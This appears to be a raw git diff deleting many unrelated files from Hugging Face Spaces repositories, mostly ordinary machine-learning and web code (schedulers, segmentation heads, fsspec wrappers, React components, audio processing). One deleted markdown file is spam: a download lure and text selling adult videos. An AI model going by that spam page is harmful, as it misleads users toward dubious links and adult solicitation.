of at 0. In the case that warmup_iters << max_iters the two are - # very close to each other. - return [ - base_lr - * warmup_factor - * 0.5 - * (1.0 + math.cos(math.pi * self.last_epoch / self.max_iters)) - for base_lr in self.base_lrs - ] - - def _compute_values(self) -> List[float]: - # The new interface - return self.get_lr() - - -def _get_warmup_factor_at_iter( - method: str, iter: int, warmup_iters: int, warmup_factor: float -) -> float: - """ - Return the learning rate warmup factor at a specific iteration. - See :paper:`ImageNet in 1h` for more details. - - Args: - method (str): warmup method; either "constant" or "linear". - iter (int): iteration at which to calculate the warmup factor. - warmup_iters (int): the number of warmup iterations. - warmup_factor (float): the base warmup factor (the meaning changes according - to the method used). - - Returns: - float: the effective warmup factor at the given iteration. - """ - if iter >= warmup_iters: - return 1.0 - - if method == "constant": - return warmup_factor - elif method == "linear": - alpha = iter / warmup_iters - return warmup_factor * (1 - alpha) + alpha - else: - raise ValueError("Unknown warmup method: {}".format(method)) diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmcv/utils/trace.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmcv/utils/trace.py deleted file mode 100644 index 5ca99dc3eda05ef980d9a4249b50deca8273b6cc..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmcv/utils/trace.py +++ /dev/null @@ -1,23 +0,0 @@ -import warnings - -import torch - -from annotator.uniformer.mmcv.utils import digit_version - - -def is_jit_tracing() -> bool: - if (torch.__version__ != 'parrots' - and digit_version(torch.__version__) >= digit_version('1.6.0')): - on_trace = torch.jit.is_tracing() - # In PyTorch 1.6, torch.jit.is_tracing has a bug. - # Refers to https://github.com/pytorch/pytorch/issues/42448 - if isinstance(on_trace, bool): - return on_trace - else: - return torch._C._is_tracing() - else: - warnings.warn( - 'torch.jit.is_tracing is only supported after v1.6.0. ' - 'Therefore is_tracing returns False automatically. Please ' - 'set on_trace manually if you are using trace.', UserWarning) - return False diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmseg/models/decode_heads/aspp_head.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmseg/models/decode_heads/aspp_head.py deleted file mode 100644 index aa914b5bb25124d1ff199553d96713d6a80484c0..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmseg/models/decode_heads/aspp_head.py +++ /dev/null @@ -1,107 +0,0 @@ -import torch -import torch.nn as nn -from annotator.uniformer.mmcv.cnn import ConvModule - -from annotator.uniformer.mmseg.ops import resize -from ..builder import HEADS -from .decode_head import BaseDecodeHead - - -class ASPPModule(nn.ModuleList): - """Atrous Spatial Pyramid Pooling (ASPP) Module. - - Args: - dilations (tuple[int]): Dilation rate of each layer. - in_channels (int): Input channels. - channels (int): Channels after modules, before conv_seg. - conv_cfg (dict|None): Config of conv layers. - norm_cfg (dict|None): Config of norm layers. - act_cfg (dict): Config of activation layers. - """ - - def __init__(self, dilations, in_channels, channels, conv_cfg, norm_cfg, - act_cfg): - super(ASPPModule, self).__init__() - self.dilations = dilations - self.in_channels = in_channels - self.channels = channels - self.conv_cfg = conv_cfg - self.norm_cfg = norm_cfg - self.act_cfg = act_cfg - for dilation in dilations: - self.append( - ConvModule( - self.in_channels, - self.channels, - 1 if dilation == 1 else 3, - dilation=dilation, - padding=0 if dilation == 1 else dilation, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg)) - - def forward(self, x): - """Forward function.""" - aspp_outs = [] - for aspp_module in self: - aspp_outs.append(aspp_module(x)) - - return aspp_outs - - -@HEADS.register_module() -class ASPPHead(BaseDecodeHead): - """Rethinking Atrous Convolution for Semantic Image Segmentation. - - This head is the implementation of `DeepLabV3 - `_. - - Args: - dilations (tuple[int]): Dilation rates for ASPP module. - Default: (1, 6, 12, 18). - """ - - def __init__(self, dilations=(1, 6, 12, 18), **kwargs): - super(ASPPHead, self).__init__(**kwargs) - assert isinstance(dilations, (list, tuple)) - self.dilations = dilations - self.image_pool = nn.Sequential( - nn.AdaptiveAvgPool2d(1), - ConvModule( - self.in_channels, - self.channels, - 1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg)) - self.aspp_modules = ASPPModule( - dilations, - self.in_channels, - self.channels, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - self.bottleneck = ConvModule( - (len(dilations) + 1) * self.channels, - self.channels, - 3, - padding=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - - def forward(self, inputs): - """Forward function.""" - x = self._transform_inputs(inputs) - aspp_outs = [ - resize( - self.image_pool(x), - size=x.size()[2:], - mode='bilinear', - align_corners=self.align_corners) - ] - aspp_outs.extend(self.aspp_modules(x)) - aspp_outs = torch.cat(aspp_outs, dim=1) - output = self.bottleneck(aspp_outs) - output = self.cls_seg(output) - return output diff --git a/spaces/cozyanduofen/bingo/src/components/ui/select.tsx b/spaces/cozyanduofen/bingo/src/components/ui/select.tsx deleted file mode 100644 index 77f12c2996f541b97663de4c9e20ab34d4ec2fac..0000000000000000000000000000000000000000 --- a/spaces/cozyanduofen/bingo/src/components/ui/select.tsx +++ /dev/null @@ -1,123 +0,0 @@ -'use client' - -import * as React from 'react' -import * as SelectPrimitive from '@radix-ui/react-select' - -import { cn } from '@/lib/utils' -import { - IconArrowDown, - IconCheck, - IconChevronUpDown -} from '@/components/ui/icons' - -const Select = SelectPrimitive.Root - -const SelectGroup = SelectPrimitive.Group - -const SelectValue = SelectPrimitive.Value - -const SelectTrigger = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, ...props }, ref) => ( - - {children} - - - - -)) -SelectTrigger.displayName = SelectPrimitive.Trigger.displayName - -const SelectContent = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, position = 'popper', ...props }, ref) => ( - - - - {children} - - - -)) -SelectContent.displayName = SelectPrimitive.Content.displayName - -const SelectLabel = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)) -SelectLabel.displayName = SelectPrimitive.Label.displayName - -const SelectItem = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, ...props }, ref) => ( - - - - - - - {children} - -)) -SelectItem.displayName = SelectPrimitive.Item.displayName - -const SelectSeparator = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)) -SelectSeparator.displayName = SelectPrimitive.Separator.displayName - -export { - Select, - SelectGroup, - SelectValue, - SelectTrigger, - SelectContent, - SelectLabel, - SelectItem, - SelectSeparator -} diff --git a/spaces/daarumadx/bot/src/gpu_info.py b/spaces/daarumadx/bot/src/gpu_info.py deleted file mode 100644 index f06825f4fccd7ea013be8eec0e479bb77e005d10..0000000000000000000000000000000000000000 --- a/spaces/daarumadx/bot/src/gpu_info.py +++ /dev/null @@ -1,34 +0,0 @@ -"""gpu-info logic.""" -import json as j - -from torch import cuda - -from config import Config as Conf - - -def get_info(): - """ - Get gpu info. - - :return: gpu info - """ - return { - "has_cuda": cuda.is_available(), - "devices": [] if not cuda.is_available() else [cuda.get_device_name(i) for i in range(cuda.device_count())], - } - - -def main(_): - """ - Start gpu info main logic. - - :param _: None - :return: None - """ - info = get_info() - if not Conf.args['json']: - Conf.log.info("Has Cuda: {}".format(info["has_cuda"])) - for (i, device) in enumerate(info["devices"]): - Conf.log.info("GPU {}: {}".format(i, device)) - else: - print(j.dumps(info)) diff --git a/spaces/darkstorm2150/protogen-web-ui/README.md b/spaces/darkstorm2150/protogen-web-ui/README.md deleted file mode 100644 index 7de302a18c1d0267c2a75988dc573e30df289538..0000000000000000000000000000000000000000 --- a/spaces/darkstorm2150/protogen-web-ui/README.md +++ /dev/null @@ -1,46 +0,0 @@ ---- -title: Stable Diffusion OpenGen v1.0 Web UI -emoji: ⚛ -colorFrom: pink -colorTo: purple -sdk: docker -#sdk_version: 3.9 -app_file: DockerApp.py -pinned: false ---- - -### Under major construction, code may be unstable - -### ProtoGen Diffusion model merged by [darkstorm2150](https://twitter.com/Predogl) - -This model was merged on a large amount of data from large datasets new and trending on civitai.com - -You can enforce camera capture by using the prompt with "modelshoot style". - -It should also be very dreamboothable, being able to generate high fidelity faces with a little amount of steps. - -**[By using this model you agree to this license](https://huggingface.co/dreamlike-art/dreamlike-photoreal-2.0/blob/main/LICENSE.md), I the creator darkstorm2150 of this merge and Hugging Face is not liable for any content created by this Protogen Model.** - - - - - - - - - - - - - - -## Other.. - -## Stable Diffusion Web UI -[https://github.com/AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui) - -## Documentation -[https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki) - -## Models License -https://huggingface.co/spaces/CompVis/stable-diffusion-license \ No newline at end of file diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/fsspec/implementations/arrow.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/fsspec/implementations/arrow.py deleted file mode 100644 index 3b1048acdec34d4f5eeff90e30e3629023c6099d..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/fsspec/implementations/arrow.py +++ /dev/null @@ -1,297 +0,0 @@ -import errno -import io -import os -import secrets -import shutil -from contextlib import suppress -from functools import cached_property, wraps - -from fsspec.spec import AbstractFileSystem -from fsspec.utils import ( - get_package_version_without_import, - infer_storage_options, - mirror_from, - tokenize, -) - - -def wrap_exceptions(func): - @wraps(func) - def wrapper(*args, **kwargs): - try: - return func(*args, **kwargs) - except OSError as exception: - if not exception.args: - raise - - message, *args = exception.args - if isinstance(message, str) and "does not exist" in message: - raise FileNotFoundError(errno.ENOENT, message) from exception - else: - raise - - return wrapper - - -PYARROW_VERSION = None - - -class ArrowFSWrapper(AbstractFileSystem): - """FSSpec-compatible wrapper of pyarrow.fs.FileSystem. - - Parameters - ---------- - fs : pyarrow.fs.FileSystem - - """ - - root_marker = "/" - - def __init__(self, fs, **kwargs): - global PYARROW_VERSION - PYARROW_VERSION = get_package_version_without_import("pyarrow") - self.fs = fs - super().__init__(**kwargs) - - @property - def protocol(self): - return self.fs.type_name - - @cached_property - def fsid(self): - return "hdfs_" + tokenize(self.fs.host, self.fs.port) - - @classmethod - def _strip_protocol(cls, path): - ops = infer_storage_options(path) - path = ops["path"] - if path.startswith("//"): - # special case for "hdfs://path" (without the triple slash) - path = path[1:] - return path - - def ls(self, path, detail=False, **kwargs): - path = self._strip_protocol(path) - from pyarrow.fs import FileSelector - - entries = [ - self._make_entry(entry) - for entry in self.fs.get_file_info(FileSelector(path)) - ] - if detail: - return entries - else: - return [entry["name"] for entry in entries] - - def info(self, path, **kwargs): - path = self._strip_protocol(path) - [info] = self.fs.get_file_info([path]) - return self._make_entry(info) - - def exists(self, path): - path = self._strip_protocol(path) - try: - self.info(path) - except FileNotFoundError: - return False - else: - return True - - def _make_entry(self, info): - from pyarrow.fs import FileType - - if info.type is FileType.Directory: - kind = "directory" - elif info.type is FileType.File: - kind = "file" - elif info.type is FileType.NotFound: - raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), info.path) - else: - kind = "other" - - return { - "name": info.path, - "size": info.size, - "type": kind, - "mtime": info.mtime, - } - - @wrap_exceptions - def cp_file(self, path1, path2, **kwargs): - path1 = self._strip_protocol(path1).rstrip("/") - path2 = self._strip_protocol(path2).rstrip("/") - - with self._open(path1, "rb") as lstream: - tmp_fname = f"{path2}.tmp.{secrets.token_hex(6)}" - try: - with self.open(tmp_fname, "wb") as rstream: - shutil.copyfileobj(lstream, rstream) - self.fs.move(tmp_fname, path2) - except BaseException: # noqa - with suppress(FileNotFoundError): - self.fs.delete_file(tmp_fname) - raise - - @wrap_exceptions - def mv(self, path1, path2, **kwargs): - path1 = self._strip_protocol(path1).rstrip("/") - path2 = self._strip_protocol(path2).rstrip("/") - self.fs.move(path1, path2) - - mv_file = mv - - @wrap_exceptions - def rm_file(self, path): - path = self._strip_protocol(path) - self.fs.delete_file(path) - - @wrap_exceptions - def rm(self, path, recursive=False, maxdepth=None): - path = self._strip_protocol(path).rstrip("/") - if self.isdir(path): - if recursive: - self.fs.delete_dir(path) - else: - raise ValueError("Can't delete directories without recursive=False") - else: - self.fs.delete_file(path) - - @wrap_exceptions - def _open(self, path, mode="rb", block_size=None, seekable=True, **kwargs): - if mode == "rb": - if seekable: - method = self.fs.open_input_file - else: - method = self.fs.open_input_stream - elif mode == "wb": - method = self.fs.open_output_stream - elif mode == "ab": - method = self.fs.open_append_stream - else: - raise ValueError(f"unsupported mode for Arrow filesystem: {mode!r}") - - _kwargs = {} - if mode != "rb" or not seekable: - if int(PYARROW_VERSION.split(".")[0]) >= 4: - # disable compression auto-detection - _kwargs["compression"] = None - stream = method(path, **_kwargs) - - return ArrowFile(self, stream, path, mode, block_size, **kwargs) - - @wrap_exceptions - def mkdir(self, path, create_parents=True, **kwargs): - path = self._strip_protocol(path) - if create_parents: - self.makedirs(path, exist_ok=True) - else: - self.fs.create_dir(path, recursive=False) - - @wrap_exceptions - def makedirs(self, path, exist_ok=False): - path = self._strip_protocol(path) - self.fs.create_dir(path, recursive=True) - - @wrap_exceptions - def rmdir(self, path): - path = self._strip_protocol(path) - self.fs.delete_dir(path) - - @wrap_exceptions - def modified(self, path): - path = self._strip_protocol(path) - return self.fs.get_file_info(path).mtime - - def cat_file(self, path, start=None, end=None, **kwargs): - kwargs["seekable"] = start not in [None, 0] - return super().cat_file(path, start=None, end=None, **kwargs) - - def get_file(self, rpath, lpath, **kwargs): - kwargs["seekable"] = False - super().get_file(rpath, lpath, **kwargs) - - -@mirror_from( - "stream", - [ - "read", - "seek", - "tell", - "write", - "readable", - "writable", - "close", - "size", - "seekable", - ], -) -class ArrowFile(io.IOBase): - def __init__(self, fs, stream, path, mode, block_size=None, **kwargs): - self.path = path - self.mode = mode - - self.fs = fs - self.stream = stream - - self.blocksize = self.block_size = block_size - self.kwargs = kwargs - - def __enter__(self): - return self - - def __exit__(self, *args): - return self.close() - - -class HadoopFileSystem(ArrowFSWrapper): - """A wrapper on top of the pyarrow.fs.HadoopFileSystem - to connect it's interface with fsspec""" - - protocol = "hdfs" - - def __init__( - self, - host="default", - port=0, - user=None, - kerb_ticket=None, - extra_conf=None, - **kwargs, - ): - """ - - Parameters - ---------- - host: str - Hostname, IP or "default" to try to read from Hadoop config - port: int - Port to connect on, or default from Hadoop config if 0 - user: str or None - If given, connect as this username - kerb_ticket: str or None - If given, use this ticket for authentication - extra_conf: None or dict - Passed on to HadoopFileSystem - """ - from pyarrow.fs import HadoopFileSystem - - fs = HadoopFileSystem( - host=host, - port=port, - user=user, - kerb_ticket=kerb_ticket, - extra_conf=extra_conf, - ) - super().__init__(fs=fs, **kwargs) - - @staticmethod - def _get_kwargs_from_urls(path): - ops = infer_storage_options(path) - out = {} - if ops.get("host", None): - out["host"] = ops["host"] - if ops.get("username", None): - out["user"] = ops["username"] - if ops.get("port", None): - out["port"] = ops["port"] - return out diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-7791ea05.css b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-7791ea05.css deleted file mode 100644 index 05668d2c0ae8519b42b80fc59874d05887b44a15..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-7791ea05.css +++ /dev/null @@ -1 +0,0 @@ -.container.svelte-taudaj.svelte-taudaj{display:flex;flex-direction:column;gap:var(--spacing-sm);padding:var(--block-padding)}.hl.svelte-taudaj+.hl.svelte-taudaj{margin-left:var(--size-1)}.textspan.svelte-taudaj:last-child>.label.svelte-taudaj{margin-right:0}.category-legend.svelte-taudaj.svelte-taudaj{display:flex;flex-wrap:wrap;gap:var(--spacing-sm);color:#000}.category-label.svelte-taudaj.svelte-taudaj{cursor:pointer;border-radius:var(--radius-xs);padding-right:var(--size-2);padding-left:var(--size-2);font-weight:var(--weight-semibold)}.color-legend.svelte-taudaj.svelte-taudaj{display:flex;justify-content:space-between;border-radius:var(--radius-xs);background:linear-gradient(to right,var(--color-purple),rgba(255,255,255,0),var(--color-red));padding:var(--size-1) var(--size-2);font-weight:var(--weight-semibold)}.textfield.svelte-taudaj.svelte-taudaj{box-sizing:border-box;border-radius:var(--radius-xs);background:var(--background-fill-primary);background-color:transparent;max-width:var(--size-full);line-height:var(--scale-4);word-break:break-all}.textspan.svelte-taudaj.svelte-taudaj{transition:.15s;border-radius:var(--radius-xs);padding-top:2.5px;padding-right:var(--size-1);padding-bottom:3.5px;padding-left:var(--size-1);color:#000}.label.svelte-taudaj.svelte-taudaj{transition:.15s;margin-top:1px;margin-right:calc(var(--size-1) * -1);border-radius:var(--radius-xs);padding:1px 5px;color:var(--body-text-color);color:#fff;font-weight:var(--weight-bold);font-size:var(--text-sm);text-transform:uppercase}.text.svelte-taudaj.svelte-taudaj{color:#000;white-space:pre-wrap}.score-text.svelte-taudaj .text.svelte-taudaj{color:var(--body-text-color)}.score-text.svelte-taudaj.svelte-taudaj{margin-right:var(--size-1);padding:var(--size-1)}.no-cat.svelte-taudaj.svelte-taudaj,.no-label.svelte-taudaj.svelte-taudaj{color:var(--body-text-color)}.selectable.svelte-taudaj.svelte-taudaj{cursor:pointer} diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/importlib_resources/_adapters.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/importlib_resources/_adapters.py deleted file mode 100644 index 50688fbb666658c5b0569a363a4ea5b75f2fc00d..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/importlib_resources/_adapters.py +++ /dev/null @@ -1,168 +0,0 @@ -from contextlib import suppress -from io import TextIOWrapper - -from . import abc - - -class SpecLoaderAdapter: - """ - Adapt a package spec to adapt the underlying loader. - """ - - def __init__(self, spec, adapter=lambda spec: spec.loader): - self.spec = spec - self.loader = adapter(spec) - - def __getattr__(self, name): - return getattr(self.spec, name) - - -class TraversableResourcesLoader: - """ - Adapt a loader to provide TraversableResources. - """ - - def __init__(self, spec): - self.spec = spec - - def get_resource_reader(self, name): - return CompatibilityFiles(self.spec)._native() - - -def _io_wrapper(file, mode='r', *args, **kwargs): - if mode == 'r': - return TextIOWrapper(file, *args, **kwargs) - elif mode == 'rb': - return file - raise ValueError(f"Invalid mode value '{mode}', only 'r' and 'rb' are supported") - - -class CompatibilityFiles: - """ - Adapter for an existing or non-existent resource reader - to provide a compatibility .files(). - """ - - class SpecPath(abc.Traversable): - """ - Path tied to a module spec. - Can be read and exposes the resource reader children. - """ - - def __init__(self, spec, reader): - self._spec = spec - self._reader = reader - - def iterdir(self): - if not self._reader: - return iter(()) - return iter( - CompatibilityFiles.ChildPath(self._reader, path) - for path in self._reader.contents() - ) - - def is_file(self): - return False - - is_dir = is_file - - def joinpath(self, other): - if not self._reader: - return CompatibilityFiles.OrphanPath(other) - return CompatibilityFiles.ChildPath(self._reader, other) - - @property - def name(self): - return self._spec.name - - def open(self, mode='r', *args, **kwargs): - return _io_wrapper(self._reader.open_resource(None), mode, *args, **kwargs) - - class ChildPath(abc.Traversable): - """ - Path tied to a resource reader child. - Can be read but doesn't expose any meaningful children. - """ - - def __init__(self, reader, name): - self._reader = reader - self._name = name - - def iterdir(self): - return iter(()) - - def is_file(self): - return self._reader.is_resource(self.name) - - def is_dir(self): - return not self.is_file() - - def joinpath(self, other): - return CompatibilityFiles.OrphanPath(self.name, other) - - @property - def name(self): - return self._name - - def open(self, mode='r', *args, **kwargs): - return _io_wrapper( - self._reader.open_resource(self.name), mode, *args, **kwargs - ) - - class OrphanPath(abc.Traversable): - """ - Orphan path, not tied to a module spec or resource reader. - Can't be read and doesn't expose any meaningful children. - """ - - def __init__(self, *path_parts): - if len(path_parts) < 1: - raise ValueError('Need at least one path part to construct a path') - self._path = path_parts - - def iterdir(self): - return iter(()) - - def is_file(self): - return False - - is_dir = is_file - - def joinpath(self, other): - return CompatibilityFiles.OrphanPath(*self._path, other) - - @property - def name(self): - return self._path[-1] - - def open(self, mode='r', *args, **kwargs): - raise FileNotFoundError("Can't open orphan path") - - def __init__(self, spec): - self.spec = spec - - @property - def _reader(self): - with suppress(AttributeError): - return self.spec.loader.get_resource_reader(self.spec.name) - - def _native(self): - """ - Return the native reader if it supports files(). - """ - reader = self._reader - return reader if hasattr(reader, 'files') else self - - def __getattr__(self, attr): - return getattr(self._reader, attr) - - def files(self): - return CompatibilityFiles.SpecPath(self.spec, self._reader) - - -def wrap_spec(package): - """ - Construct a package spec with traversable compatibility - on the spec/loader/reader. - """ - return SpecLoaderAdapter(package.__spec__, TraversableResourcesLoader) diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/jsonschema/tests/__init__.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/jsonschema/tests/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/deepskyreal/ai-mixer-hotchpotch/sad_talker/src/utils/safetensor_helper.py b/spaces/deepskyreal/ai-mixer-hotchpotch/sad_talker/src/utils/safetensor_helper.py deleted file mode 100644 index 3cdbdd21e4ed656dfe2d31a57360afb3e96480b3..0000000000000000000000000000000000000000 --- a/spaces/deepskyreal/ai-mixer-hotchpotch/sad_talker/src/utils/safetensor_helper.py +++ /dev/null @@ -1,8 +0,0 @@ - - -def load_x_from_safetensor(checkpoint, key): - x_generator = {} - for k,v in checkpoint.items(): - if key in k: - x_generator[k.replace(key+'.', '')] = v - return x_generator \ No newline at end of file diff --git a/spaces/diacanFperku/AutoGPT/Brianna Aka Jessi - 100 Pics.55 !LINK!.md b/spaces/diacanFperku/AutoGPT/Brianna Aka Jessi - 100 Pics.55 !LINK!.md deleted file mode 100644 index 2bdcca24eab963977cf1ed1dfbb07d794762ffeb..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/Brianna Aka Jessi - 100 Pics.55 !LINK!.md +++ /dev/null @@ -1,11 +0,0 @@ -

    Brianna aka Jessi - 100 Pics.55


    Download >> https://gohhs.com/2uFT6B



    -
    -3 videos - $12 -6 videos - $35 -10 videos - $55 -Video every week (3 videos + photos) for 6-8 weeks - $100. Text me XXX if interested ❤️. In our family, we have often discussed how many people do not love their children. -And it is not the fault of the children that mom and dad do not love them, but because the parents themselves are not confident in their abilities, in the correctness of their decisions and in their love, which means they do not love their children. -As a result, both children and parents suffer - children do not receive proper parental love and respect, and parents cannot find themselves and their own way. -What about children? -Well, what about children? -They become as miserable and deprived as their parents. 8a78ff9644
    -
    -
    -

    diff --git a/spaces/digitalxingtong/Jiaohuaji-Bert-Vits2/mel_processing.py b/spaces/digitalxingtong/Jiaohuaji-Bert-Vits2/mel_processing.py deleted file mode 100644 index 50435ecf88ef4fb6c1d47f3e6edd04c3ea7d3e80..0000000000000000000000000000000000000000 --- a/spaces/digitalxingtong/Jiaohuaji-Bert-Vits2/mel_processing.py +++ /dev/null @@ -1,112 +0,0 @@ -import math -import os -import random -import torch -from torch import nn -import torch.nn.functional as F -import torch.utils.data -import numpy as np -import librosa -import librosa.util as librosa_util -from librosa.util import normalize, pad_center, tiny -from scipy.signal import get_window -from scipy.io.wavfile import read -from librosa.filters import mel as librosa_mel_fn - -MAX_WAV_VALUE = 32768.0 - - -def dynamic_range_compression_torch(x, C=1, clip_val=1e-5): - """ - PARAMS - ------ - C: compression factor - """ - return torch.log(torch.clamp(x, min=clip_val) * C) - - -def dynamic_range_decompression_torch(x, C=1): - """ - PARAMS - ------ - C: compression factor used to compress - """ - return torch.exp(x) / C - - -def spectral_normalize_torch(magnitudes): - output = dynamic_range_compression_torch(magnitudes) - return output - - -def spectral_de_normalize_torch(magnitudes): - output = dynamic_range_decompression_torch(magnitudes) - return output - - -mel_basis = {} -hann_window = {} - - -def spectrogram_torch(y, n_fft, sampling_rate, hop_size, win_size, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - return spec - - -def spec_to_mel_torch(spec, n_fft, num_mels, sampling_rate, fmin, fmax): - global mel_basis - dtype_device = str(spec.dtype) + '_' + str(spec.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=spec.dtype, device=spec.device) - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - return spec - - -def mel_spectrogram_torch(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global mel_basis, hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=y.dtype, device=y.device) - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - - return spec diff --git a/spaces/dinhminh20521597/OCR_DEMO/configs/_base_/det_models/panet_r50_fpem_ffm.py b/spaces/dinhminh20521597/OCR_DEMO/configs/_base_/det_models/panet_r50_fpem_ffm.py deleted file mode 100644 index 4d8812532c73f8945097de8262b539d0109055df..0000000000000000000000000000000000000000 --- a/spaces/dinhminh20521597/OCR_DEMO/configs/_base_/det_models/panet_r50_fpem_ffm.py +++ /dev/null @@ -1,21 +0,0 @@ -model = dict( - type='PANet', - pretrained='torchvision://resnet50', - backbone=dict( - type='mmdet.ResNet', - depth=50, - num_stages=4, - out_indices=(0, 1, 2, 3), - frozen_stages=1, - norm_cfg=dict(type='BN', requires_grad=True), - norm_eval=True, - style='caffe'), - neck=dict(type='FPEM_FFM', in_channels=[256, 512, 1024, 2048]), - bbox_head=dict( - type='PANHead', - in_channels=[128, 128, 128, 128], - out_channels=6, - loss=dict(type='PANLoss', speedup_bbox_thr=32), - postprocessor=dict(type='PANPostprocessor', text_repr_type='poly')), - train_cfg=None, - test_cfg=None) diff --git a/spaces/ds520/bingo/src/lib/bots/bing/types.ts b/spaces/ds520/bingo/src/lib/bots/bing/types.ts deleted file mode 100644 index 02cd5e8b01e3529642d28dc1539bf958f4ac420b..0000000000000000000000000000000000000000 --- a/spaces/ds520/bingo/src/lib/bots/bing/types.ts +++ /dev/null @@ -1,259 +0,0 @@ -export type Author = 'user' | 'system' | 'bot' - -export type BotId = 'bing' - -export enum BingConversationStyle { - Creative = 'Creative', - Balanced = 'Balanced', - Precise = 'Precise' -} - -export enum ErrorCode { - CONVERSATION_LIMIT = 'CONVERSATION_LIMIT', - BING_UNAUTHORIZED = 'BING_UNAUTHORIZED', - BING_FORBIDDEN = 'BING_FORBIDDEN', - BING_CAPTCHA = 'BING_CAPTCHA', - THROTTLE_LIMIT = 'THROTTLE_LIMIT', - NOTFOUND_ERROR = 'NOT_FOUND_ERROR', - UNKOWN_ERROR = 'UNKOWN_ERROR', - NETWORK_ERROR = 'NETWORK_ERROR', -} - -export class ChatError extends Error { - code: ErrorCode - constructor(message: string, code: ErrorCode) { - super(message) - this.code = code - } -} - -export type ChatMessageModel = { - id: string - author: Author - text: string - error?: ChatError - throttling?: Throttling - sourceAttributions?: SourceAttribution[] - suggestedResponses?: SuggestedResponse[] -} - -export interface ConversationModel { - messages: ChatMessageModel[] -} - -export type Event = - | { - type: 'UPDATE_ANSWER' - data: { - text: string - spokenText?: string - sourceAttributions?: SourceAttribution[] - suggestedResponses?: SuggestedResponse[] - 